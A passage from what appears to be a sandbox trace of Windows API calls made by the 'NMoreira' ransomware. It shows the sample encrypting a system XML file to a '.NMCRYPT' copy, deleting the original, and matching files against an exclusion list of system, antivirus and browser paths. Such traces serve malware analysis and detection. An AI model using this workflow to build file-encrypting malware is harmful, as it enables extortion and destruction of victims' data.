hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.454] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.455] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.455] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0155.455] CryptHashData (hHash=0x9ad278, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0155.455] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad778) returned 1 [0155.455] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0155.455] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0155.455] wcslen (_String="\\\\?\\") returned 0x4 [0155.455] CryptDuplicateKey (in: hKey=0x9ad778, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad2b8) returned 1 [0155.455] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0155.456] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0155.456] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=219) returned 1 [0155.456] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0155.456] ReadFile (in: hFile=0x1624, lpBuffer=0x28d51c8, nNumberOfBytesToRead=0xdb, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d51c8*, lpNumberOfBytesRead=0x2d7e160*=0xdb, lpOverlapped=0x0) returned 1 [0155.457] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xdb, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xe0) returned 1 [0155.457] GetLastError () returned 0x0 [0155.457] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0xe0, lpOverlapped=0x0) returned 1 [0155.499] ReadFile (in: hFile=0x1624, lpBuffer=0x28d51c8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d51c8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0155.499] WriteFile (in: hFile=0x588, lpBuffer=0x28d51c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x28d51c8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0155.499] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml")) returned 0x20 [0155.500] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml", dwFileAttributes=0x20) returned 0 [0155.500] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml") returned 1 [0155.500] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml")) returned 0 [0155.500] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" [0155.500] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 1 [0155.500] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD29B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd29b.tmp")) returned 0xd29b [0155.501] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD29B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd29b.tmp"), dwFlags=0x1) returned 0 [0155.501] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD29B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd29b.tmp")) returned 1 [0155.501] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0155.501] wcslen (_String="OK") returned 0x2 [0155.501] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.501] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.501] CryptDestroyKey (hKey=0x9ad778) returned 1 [0155.501] CryptDestroyHash (hHash=0x9ad278) returned 1 [0155.501] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0155.501] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.501] wcscmp (_String1="oskpred", _String2=".") returned 1 [0155.501] wcscmp (_String1="oskpred", _String2="..") returned 1 [0155.501] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.501] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*NMCRYPT") returned 0 [0155.501] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*Recovers your files.html") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*.exe") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*.dll") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*.lnk") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*.bat") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*.ini") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*.msi") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*.scf") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*pagefile.sys*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*NTUSER.DAT*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*AppData*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*\\winrar\\*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*\\java\\*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*\\windows\\*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*\\ESET\\*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*\\AVG\\*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*\\AVIRA\\*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*Atheros*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*Realtek*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*bootmgr*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*boot*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*boot*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*CONFIG.SYS*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*IO.SYS*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*MSDOS.SYS*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*NTDETECT.COM*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*ntldr*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*chrome*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*opera*") returned 0 [0155.502] PathMatchSpecW (pszFile="oskpred.xml", pszSpec="*firefox*") returned 0 [0155.502] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml", pszSpec="*") returned 1 [0155.502] strlen (_Str="NMoreira") returned 0x8 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.502] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.503] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.504] CryptGenRandom (in: hProv=0x8bf310, 